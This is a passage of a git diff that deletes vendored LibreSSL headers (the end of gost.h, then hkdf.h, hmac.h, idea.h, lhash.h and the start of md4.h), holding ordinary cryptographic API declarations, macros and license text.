-int GOST2814789IMIT_Update(GOST2814789IMIT_CTX *c, const void *data, size_t len);
-int GOST2814789IMIT_Final(unsigned char *md, GOST2814789IMIT_CTX *c);
-void GOST2814789IMIT_Transform(GOST2814789IMIT_CTX *c, const unsigned char *data);
-unsigned char *GOST2814789IMIT(const unsigned char *d, size_t n,
-		unsigned char *md, int nid,
-		const unsigned char *key, const unsigned char *iv);
-
-#define GOSTR341194_LONG unsigned int
-
-#define GOSTR341194_LENGTH	32
-#define GOSTR341194_CBLOCK	32
-#define GOSTR341194_LBLOCK	(GOSTR341194_CBLOCK/4)
-
-typedef struct GOSTR341194state_st {
-	GOSTR341194_LONG	Nl, Nh;
-	GOSTR341194_LONG	data[GOSTR341194_LBLOCK];
-	unsigned int		num;
-
-	GOST2814789_KEY		cipher;
-	unsigned char		H[GOSTR341194_CBLOCK];
-	unsigned char		S[GOSTR341194_CBLOCK];
-} GOSTR341194_CTX;
-
-/* Note, also removed second parameter and removed dctx->cipher setting */
-int GOSTR341194_Init(GOSTR341194_CTX *c, int nid);
-int GOSTR341194_Update(GOSTR341194_CTX *c, const void *data, size_t len);
-int GOSTR341194_Final(unsigned char *md, GOSTR341194_CTX *c);
-void GOSTR341194_Transform(GOSTR341194_CTX *c, const unsigned char *data);
-unsigned char *GOSTR341194(const unsigned char *d, size_t n,unsigned char *md, int nid);
-
-#if defined(_LP64)
-#define STREEBOG_LONG64 unsigned long
-#define U64(C)     C##UL
-#else
-#define STREEBOG_LONG64 unsigned long long
-#define U64(C)     C##ULL
-#endif
-
-#define STREEBOG_LBLOCK 8
-#define STREEBOG_CBLOCK 64
-#define STREEBOG256_LENGTH 32
-#define STREEBOG512_LENGTH 64
-
-typedef struct STREEBOGstate_st {
-	STREEBOG_LONG64	data[STREEBOG_LBLOCK];
-	unsigned int	num;
-	unsigned int	md_len;
-	STREEBOG_LONG64	h[STREEBOG_LBLOCK];
-	STREEBOG_LONG64 N[STREEBOG_LBLOCK];
-	STREEBOG_LONG64 Sigma[STREEBOG_LBLOCK];
-} STREEBOG_CTX;
-
-int STREEBOG256_Init(STREEBOG_CTX *c);
-int STREEBOG256_Update(STREEBOG_CTX *c, const void *data, size_t len);
-int STREEBOG256_Final(unsigned char *md, STREEBOG_CTX *c);
-void STREEBOG256_Transform(STREEBOG_CTX *c, const unsigned char *data);
-unsigned char *STREEBOG256(const unsigned char *d, size_t n,unsigned char *md);
-
-int STREEBOG512_Init(STREEBOG_CTX *c);
-int STREEBOG512_Update(STREEBOG_CTX *c, const void *data, size_t len);
-int STREEBOG512_Final(unsigned char *md, STREEBOG_CTX *c);
-void STREEBOG512_Transform(STREEBOG_CTX *c, const unsigned char *data);
-unsigned char *STREEBOG512(const unsigned char *d, size_t n,unsigned char *md);
-
-typedef struct gost_key_st GOST_KEY;
-GOST_KEY *GOST_KEY_new(void);
-void GOST_KEY_free(GOST_KEY * r);
-int GOST_KEY_check_key(const GOST_KEY * eckey);
-int GOST_KEY_set_public_key_affine_coordinates(GOST_KEY * key, BIGNUM * x, BIGNUM * y);
-const EC_GROUP * GOST_KEY_get0_group(const GOST_KEY * key);
-int GOST_KEY_set_group(GOST_KEY * key, const EC_GROUP * group);
-int GOST_KEY_get_digest(const GOST_KEY * key);
-int GOST_KEY_set_digest(GOST_KEY * key, int digest_nid);
-const BIGNUM * GOST_KEY_get0_private_key(const GOST_KEY * key);
-int GOST_KEY_set_private_key(GOST_KEY * key, const BIGNUM * priv_key);
-const EC_POINT * GOST_KEY_get0_public_key(const GOST_KEY * key);
-int GOST_KEY_set_public_key(GOST_KEY * key, const EC_POINT * pub_key);
-size_t GOST_KEY_get_size(const GOST_KEY * r);
-
-/* Gost-specific pmeth control-function parameters */
-/* For GOST R34.10 parameters */
-#define EVP_PKEY_CTRL_GOST_PARAMSET	(EVP_PKEY_ALG_CTRL+1)
-#define EVP_PKEY_CTRL_GOST_SIG_FORMAT	(EVP_PKEY_ALG_CTRL+2)
-#define EVP_PKEY_CTRL_GOST_SET_DIGEST	(EVP_PKEY_ALG_CTRL+3)
-#define EVP_PKEY_CTRL_GOST_GET_DIGEST	(EVP_PKEY_ALG_CTRL+4)
-
-#define GOST_SIG_FORMAT_SR_BE	0
-#define GOST_SIG_FORMAT_RS_LE	1
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_GOST_strings(void);
-
-/* Error codes for the GOST functions. */
-
-/* Function codes. */
-#define GOST_F_DECODE_GOST01_ALGOR_PARAMS		 104
-#define GOST_F_ENCODE_GOST01_ALGOR_PARAMS		 105
-#define GOST_F_GOST2001_COMPUTE_PUBLIC			 106
-#define GOST_F_GOST2001_DO_SIGN				 107
-#define GOST_F_GOST2001_DO_VERIFY			 108
-#define GOST_F_GOST2001_KEYGEN				 109
-#define GOST_F_GOST89_GET_ASN1_PARAMETERS		 102
-#define GOST_F_GOST89_SET_ASN1_PARAMETERS		 103
-#define GOST_F_GOST_KEY_CHECK_KEY			 124
-#define GOST_F_GOST_KEY_NEW				 125
-#define GOST_F_GOST_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES 126
-#define GOST_F_PARAM_COPY_GOST01			 110
-#define GOST_F_PARAM_DECODE_GOST01			 111
-#define GOST_F_PKEY_GOST01_CTRL				 116
-#define GOST_F_PKEY_GOST01_DECRYPT			 112
-#define GOST_F_PKEY_GOST01_DERIVE			 113
-#define GOST_F_PKEY_GOST01_ENCRYPT			 114
-#define GOST_F_PKEY_GOST01_PARAMGEN			 115
-#define GOST_F_PKEY_GOST01_SIGN				 123
-#define GOST_F_PKEY_GOST_MAC_CTRL			 100
-#define GOST_F_PKEY_GOST_MAC_KEYGEN			 101
-#define GOST_F_PRIV_DECODE_GOST01			 117
-#define GOST_F_PUB_DECODE_GOST01			 118
-#define GOST_F_PUB_ENCODE_GOST01			 119
-#define GOST_F_PUB_PRINT_GOST01				 120
-#define GOST_F_UNPACK_SIGNATURE_CP			 121
-#define GOST_F_UNPACK_SIGNATURE_LE			 122
-
-/* Reason codes. */
-#define GOST_R_BAD_KEY_PARAMETERS_FORMAT		 104
-#define GOST_R_BAD_PKEY_PARAMETERS_FORMAT		 105
-#define GOST_R_CANNOT_PACK_EPHEMERAL_KEY		 106
-#define GOST_R_CTRL_CALL_FAILED				 107
-#define GOST_R_ERROR_COMPUTING_SHARED_KEY		 108
-#define GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO		 109
-#define GOST_R_INCOMPATIBLE_ALGORITHMS			 110
-#define GOST_R_INCOMPATIBLE_PEER_KEY			 111
-#define GOST_R_INVALID_DIGEST_TYPE			 100
-#define GOST_R_INVALID_IV_LENGTH			 103
-#define GOST_R_INVALID_MAC_KEY_LENGTH			 101
-#define GOST_R_KEY_IS_NOT_INITIALIZED			 112
-#define GOST_R_KEY_PARAMETERS_MISSING			 113
-#define GOST_R_MAC_KEY_NOT_SET				 102
-#define GOST_R_NO_PARAMETERS_SET			 115
-#define GOST_R_NO_PEER_KEY				 116
-#define GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR	 117
-#define GOST_R_PUBLIC_KEY_UNDEFINED			 118
-#define GOST_R_RANDOM_NUMBER_GENERATOR_FAILED		 120
-#define GOST_R_SIGNATURE_MISMATCH			 121
-#define GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q		 122
-#define GOST_R_UKM_NOT_SET				 123
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/hkdf.h b/thirdparty/libressl/include/openssl/hkdf.h
deleted file mode 100644
index fb0fac3..0000000
--- a/thirdparty/libressl/include/openssl/hkdf.h
+++ /dev/null
@@ -1,64 +0,0 @@
-/* Copyright (c) 2014, Google Inc.
- *
- * Permission to use, copy, modify, and/or distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
- * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
- * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
- * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */
-
-#ifndef OPENSSL_HEADER_HKDF_H
-#define OPENSSL_HEADER_HKDF_H
-
-#include <openssl/evp.h>
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-/*
- * HKDF computes HKDF (as specified by RFC 5869) of initial keying
- * material |secret| with |salt| and |info| using |digest|, and
- * outputs |out_len| bytes to |out_key|. It returns one on success and
- * zero on error.
- *
- * HKDF is an Extract-and-Expand algorithm. It does not do any key
- * stretching, and as such, is not suited to be used alone to generate
- * a key from a password.
- */
-
-int HKDF(uint8_t *out_key, size_t out_len, const struct env_md_st *digest,
-    const uint8_t *secret, size_t secret_len, const uint8_t *salt,
-    size_t salt_len, const uint8_t *info, size_t info_len);
-
-/*
- * HKDF_extract computes a HKDF PRK (as specified by RFC 5869) from
- * initial keying material |secret| and salt |salt| using |digest|,
- * and outputs |out_len| bytes to |out_key|. The maximum output size
- * is |EVP_MAX_MD_SIZE|.  It returns one on success and zero on error.
- */
-int HKDF_extract(uint8_t *out_key, size_t *out_len,
-    const struct env_md_st *digest, const uint8_t *secret,
-    size_t secret_len, const uint8_t *salt, size_t salt_len);
-
-/*
- * HKDF_expand computes a HKDF OKM (as specified by RFC 5869) of
- * length |out_len| from the PRK |prk| and info |info| using |digest|,
- * and outputs the result to |out_key|. It returns one on success and
- * zero on error.
- */
-int HKDF_expand(uint8_t *out_key, size_t out_len,
-    const EVP_MD *digest, const uint8_t *prk, size_t prk_len,
-    const uint8_t *info,  size_t info_len);
-
-
-#if defined(__cplusplus)
-}  /* extern C */
-#endif
-
-#endif  /* OPENSSL_HEADER_HKDF_H */
diff --git a/thirdparty/libressl/include/openssl/hmac.h b/thirdparty/libressl/include/openssl/hmac.h
deleted file mode 100644
index f3418b3..0000000
--- a/thirdparty/libressl/include/openssl/hmac.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/* $OpenBSD: hmac.h,v 1.12 2014/06/21 13:39:46 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-#ifndef HEADER_HMAC_H
-#define HEADER_HMAC_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_HMAC
-#error HMAC is disabled.
-#endif
-
-#include <openssl/evp.h>
-
-#define HMAC_MAX_MD_CBLOCK	128	/* largest known is SHA512 */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct hmac_ctx_st {
-	const EVP_MD *md;
-	EVP_MD_CTX md_ctx;
-	EVP_MD_CTX i_ctx;
-	EVP_MD_CTX o_ctx;
-	unsigned int key_length;
-	unsigned char key[HMAC_MAX_MD_CBLOCK];
-} HMAC_CTX;
-
-#define HMAC_size(e)	(EVP_MD_size((e)->md))
-
-
-void HMAC_CTX_init(HMAC_CTX *ctx);
-void HMAC_CTX_cleanup(HMAC_CTX *ctx);
-
-#define HMAC_cleanup(ctx) HMAC_CTX_cleanup(ctx) /* deprecated */
-
-int HMAC_Init(HMAC_CTX *ctx, const void *key, int len,
-    const EVP_MD *md); /* deprecated */
-int HMAC_Init_ex(HMAC_CTX *ctx, const void *key, int len, const EVP_MD *md,
-    ENGINE *impl);
-int HMAC_Update(HMAC_CTX *ctx, const unsigned char *data, size_t len);
-int HMAC_Final(HMAC_CTX *ctx, unsigned char *md, unsigned int *len);
-unsigned char *HMAC(const EVP_MD *evp_md, const void *key, int key_len,
-    const unsigned char *d, size_t n, unsigned char *md, unsigned int *md_len);
-int HMAC_CTX_copy(HMAC_CTX *dctx, HMAC_CTX *sctx);
-
-void HMAC_CTX_set_flags(HMAC_CTX *ctx, unsigned long flags);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/idea.h b/thirdparty/libressl/include/openssl/idea.h
deleted file mode 100644
index f76bcae..0000000
--- a/thirdparty/libressl/include/openssl/idea.h
+++ /dev/null
@@ -1,100 +0,0 @@
-/* $OpenBSD: idea.h,v 1.10 2014/06/12 15:49:29 deraadt Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_IDEA_H
-#define HEADER_IDEA_H
-
-#include <openssl/opensslconf.h> /* IDEA_INT, OPENSSL_NO_IDEA */
-
-#ifdef OPENSSL_NO_IDEA
-#error IDEA is disabled.
-#endif
-
-#define IDEA_ENCRYPT	1
-#define IDEA_DECRYPT	0
-
-#define IDEA_BLOCK	8
-#define IDEA_KEY_LENGTH	16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct idea_key_st
-	{
-	IDEA_INT data[9][6];
-	} IDEA_KEY_SCHEDULE;
-
-const char *idea_options(void);
-void idea_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	IDEA_KEY_SCHEDULE *ks);
-void idea_set_encrypt_key(const unsigned char *key, IDEA_KEY_SCHEDULE *ks);
-void idea_set_decrypt_key(IDEA_KEY_SCHEDULE *ek, IDEA_KEY_SCHEDULE *dk);
-void idea_cbc_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,int enc);
-void idea_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
-	int *num,int enc);
-void idea_ofb64_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv, int *num);
-void idea_encrypt(unsigned long *in, IDEA_KEY_SCHEDULE *ks);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/lhash.h b/thirdparty/libressl/include/openssl/lhash.h
deleted file mode 100644
index 9c63657..0000000
--- a/thirdparty/libressl/include/openssl/lhash.h
+++ /dev/null
@@ -1,235 +0,0 @@
-/* $OpenBSD: lhash.h,v 1.12 2014/06/12 15:49:29 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-/* Header for dynamic hash table routines
- * Author - Eric Young
- */
-
-#ifndef HEADER_LHASH_H
-#define HEADER_LHASH_H
-
-#include <openssl/opensslconf.h>
-
-#include <stdio.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct lhash_node_st {
-	void *data;
-	struct lhash_node_st *next;
-#ifndef OPENSSL_NO_HASH_COMP
-	unsigned long hash;
-#endif
-} LHASH_NODE;
-
-typedef int (*LHASH_COMP_FN_TYPE)(const void *, const void *);
-typedef unsigned long (*LHASH_HASH_FN_TYPE)(const void *);
-typedef void (*LHASH_DOALL_FN_TYPE)(void *);
-typedef void (*LHASH_DOALL_ARG_FN_TYPE)(void *, void *);
-
-/* Macros for declaring and implementing type-safe wrappers for LHASH callbacks.
- * This way, callbacks can be provided to LHASH structures without function
- * pointer casting and the macro-defined callbacks provide per-variable casting
- * before deferring to the underlying type-specific callbacks. NB: It is
- * possible to place a "static" in front of both the DECLARE and IMPLEMENT
- * macros if the functions are strictly internal. */
-
-/* First: "hash" functions */
-#define DECLARE_LHASH_HASH_FN(name, o_type) \
-	unsigned long name##_LHASH_HASH(const void *);
-#define IMPLEMENT_LHASH_HASH_FN(name, o_type) \
-	unsigned long name##_LHASH_HASH(const void *arg) { \
-		const o_type *a = arg; \
-		return name##_hash(a); }
-#define LHASH_HASH_FN(name) name##_LHASH_HASH
-
-/* Second: "compare" functions */
-#define DECLARE_LHASH_COMP_FN(name, o_type) \
-	int name##_LHASH_COMP(const void *, const void *);
-#define IMPLEMENT_LHASH_COMP_FN(name, o_type) \
-	int name##_LHASH_COMP(const void *arg1, const void *arg2) { \
-		const o_type *a = arg1;		    \
-		const o_type *b = arg2; \
-		return name##_cmp(a,b); }
-#define LHASH_COMP_FN(name) name##_LHASH_COMP
-
-/* Third: "doall" functions */
-#define DECLARE_LHASH_DOALL_FN(name, o_type) \
-	void name##_LHASH_DOALL(void *);
-#define IMPLEMENT_LHASH_DOALL_FN(name, o_type) \
-	void name##_LHASH_DOALL(void *arg) { \
-		o_type *a = arg; \
-		name##_doall(a); }
-#define LHASH_DOALL_FN(name) name##_LHASH_DOALL
-
-/* Fourth: "doall_arg" functions */
-#define DECLARE_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
-	void name##_LHASH_DOALL_ARG(void *, void *);
-#define IMPLEMENT_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
-	void name##_LHASH_DOALL_ARG(void *arg1, void *arg2) { \
-		o_type *a = arg1; \
-		a_type *b = arg2; \
-		name##_doall_arg(a, b); }
-#define LHASH_DOALL_ARG_FN(name) name##_LHASH_DOALL_ARG
-
-typedef struct lhash_st {
-	LHASH_NODE **b;
-	LHASH_COMP_FN_TYPE comp;
-	LHASH_HASH_FN_TYPE hash;
-	unsigned int num_nodes;
-	unsigned int num_alloc_nodes;
-	unsigned int p;
-	unsigned int pmax;
-	unsigned long up_load; /* load times 256 */
-	unsigned long down_load; /* load times 256 */
-	unsigned long num_items;
-
-	unsigned long num_expands;
-	unsigned long num_expand_reallocs;
-	unsigned long num_contracts;
-	unsigned long num_contract_reallocs;
-	unsigned long num_hash_calls;
-	unsigned long num_comp_calls;
-	unsigned long num_insert;
-	unsigned long num_replace;
-	unsigned long num_delete;
-	unsigned long num_no_delete;
-	unsigned long num_retrieve;
-	unsigned long num_retrieve_miss;
-	unsigned long num_hash_comps;
-
-	int error;
-} _LHASH;	/* Do not use _LHASH directly, use LHASH_OF
-		 * and friends */
-
-#define LH_LOAD_MULT	256
-
-/* Indicates a malloc() error in the last call, this is only bad
- * in lh_insert(). */
-#define lh_error(lh)	((lh)->error)
-
-_LHASH *lh_new(LHASH_HASH_FN_TYPE h, LHASH_COMP_FN_TYPE c);
-void lh_free(_LHASH *lh);
-void *lh_insert(_LHASH *lh, void *data);
-void *lh_delete(_LHASH *lh, const void *data);
-void *lh_retrieve(_LHASH *lh, const void *data);
-void lh_doall(_LHASH *lh, LHASH_DOALL_FN_TYPE func);
-void lh_doall_arg(_LHASH *lh, LHASH_DOALL_ARG_FN_TYPE func, void *arg);
-unsigned long lh_strhash(const char *c);
-unsigned long lh_num_items(const _LHASH *lh);
-
-void lh_stats(const _LHASH *lh, FILE *out);
-void lh_node_stats(const _LHASH *lh, FILE *out);
-void lh_node_usage_stats(const _LHASH *lh, FILE *out);
-
-#ifndef OPENSSL_NO_BIO
-void lh_stats_bio(const _LHASH *lh, BIO *out);
-void lh_node_stats_bio(const _LHASH *lh, BIO *out);
-void lh_node_usage_stats_bio(const _LHASH *lh, BIO *out);
-#endif
-
-/* Type checking... */
-
-#define LHASH_OF(type) struct lhash_st_##type
-
-#define DECLARE_LHASH_OF(type) LHASH_OF(type) { int dummy; }
-
-#define CHECKED_LHASH_OF(type,lh) \
-  ((_LHASH *)CHECKED_PTR_OF(LHASH_OF(type),lh))
-
-/* Define wrapper functions. */
-#define LHM_lh_new(type, name) \
-  ((LHASH_OF(type) *)lh_new(LHASH_HASH_FN(name), LHASH_COMP_FN(name)))
-#define LHM_lh_error(type, lh) \
-  lh_error(CHECKED_LHASH_OF(type,lh))
-#define LHM_lh_insert(type, lh, inst) \
-  ((type *)lh_insert(CHECKED_LHASH_OF(type, lh), \
-		     CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_retrieve(type, lh, inst) \
-  ((type *)lh_retrieve(CHECKED_LHASH_OF(type, lh), \
-		       CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_delete(type, lh, inst) \
-  ((type *)lh_delete(CHECKED_LHASH_OF(type, lh),			\
-		     CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_doall(type, lh,fn) lh_doall(CHECKED_LHASH_OF(type, lh), fn)
-#define LHM_lh_doall_arg(type, lh, fn, arg_type, arg) \
-  lh_doall_arg(CHECKED_LHASH_OF(type, lh), fn, CHECKED_PTR_OF(arg_type, arg))
-#define LHM_lh_num_items(type, lh) lh_num_items(CHECKED_LHASH_OF(type, lh))
-#define LHM_lh_down_load(type, lh) (CHECKED_LHASH_OF(type, lh)->down_load)
-#define LHM_lh_node_stats_bio(type, lh, out) \
-  lh_node_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_node_usage_stats_bio(type, lh, out) \
-  lh_node_usage_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_stats_bio(type, lh, out) \
-  lh_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_free(type, lh) lh_free(CHECKED_LHASH_OF(type, lh))
-
-DECLARE_LHASH_OF(OPENSSL_STRING);
-DECLARE_LHASH_OF(OPENSSL_CSTRING);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/md4.h b/thirdparty/libressl/include/openssl/md4.h
deleted file mode 100644
index 04aacc9..0000000
--- a/thirdparty/libressl/include/openssl/md4.h
+++ /dev/null
@@ -1,103 +0,0 @@
-/* $OpenBSD: md4.h,v 1.16 2015/09/14 01:45:03 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
